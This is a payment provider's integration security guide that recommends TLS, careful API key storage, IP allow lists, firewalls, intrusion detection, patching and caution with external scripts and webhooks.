Integration Security Guide
Data Protection and SSL/TLS
SSL/TLS Encryption: Jupico uses SSL/TLS to encrypt all data transmitted between clients and Jupico servers. This ensures that sensitive data, such as payment details and personal information, is protected during transit.
Encryption Standards: Our platform enforces the use of strong encryption protocols (e.g., TLS 1.2 or higher) to maintain the integrity and confidentiality of data.
Authentication and Credentials Management
API Credentials: Jupico requires API keys for authentication. API keys should be kept confidential and not hard-coded into client applications. Rotate keys regularly and use environment variables to store them securely.
Credential Storage: All credentials are stored using industry-standard encryption mechanisms, ensuring that sensitive information is protected.
IP Whitelisting
IP Allow Lists: Jupico supports IP allow listing to restrict access to your API credentials and services. This feature enables you to specify which IP addresses are permitted to connect to your Jupico integration, adding an additional layer of security.
Network Security
Web Application Firewall (WAF): We recommend deploying a WAF in front of your servers. A WAF helps protect your applications by filtering and monitoring HTTP traffic between a web application and the Internet.
Intrusion Detection System (IDS): Use an IDS to continuously monitor your network for malicious activities or policy violations. An IDS can detect potential threats in real-time and help mitigate risks before they impact your services.
Minimum Configuration Requirements
API Integration: To securely connect to Jupico’s APIs, ensure that your client environment is configured with the latest security updates and patches. Always use secure connections (HTTPS) and authenticate API requests using your Jupico-provided credentials.
Firewall Rules: Configure your firewalls to allow traffic only from trusted IP addresses and block all other inbound traffic to minimize exposure to threats.
Vulnerability Management
Regular Scanning: Jupico employs regular vulnerability scanning on our servers and applications to identify and address potential security issues promptly.
Patch Management: We follow a rigorous patch management process to ensure that all systems are up-to-date with the latest security patches, protecting against known vulnerabilities.
Compliance and Best Practices
PCI DSS Compliance: Jupico is in the process of completing PCI Level 1 certification, which demonstrates our commitment to maintaining the highest standards of security for payment processing.
Security Best Practices: We recommend following best practices for application security, including input validation, secure coding techniques, and regular security assessments.
Incident Response
Monitoring and Alerts: Our systems are continuously monitored for suspicious activity. In the event of a security incident, Jupico has established procedures to quickly respond, investigate, and resolve the issue.
Customer Notifications: If an incident involves customer data, Jupico will notify affected parties promptly and provide guidance on any necessary actions.
Security Considerations
Including JavaScript from external sources can expose your application to security risks, as your security becomes dependent on theirs. If an external source is compromised, an attacker could execute arbitrary code on your page. While it's common for sites to use JavaScript from services like Google Analytics, even on secure pages, we recommend minimizing the use of external scripts wherever possible.
If you're using webhooks, ensure that your endpoints are secured with TLS to prevent traffic interception and alteration of notifications (note that sensitive information is never included in a webhook event).
Adhering to Data Security Standards is essential, but it's just the beginning of a comprehensive security approach. To further enhance your understanding of web security, consider exploring the following resources:
Updated 6 months ago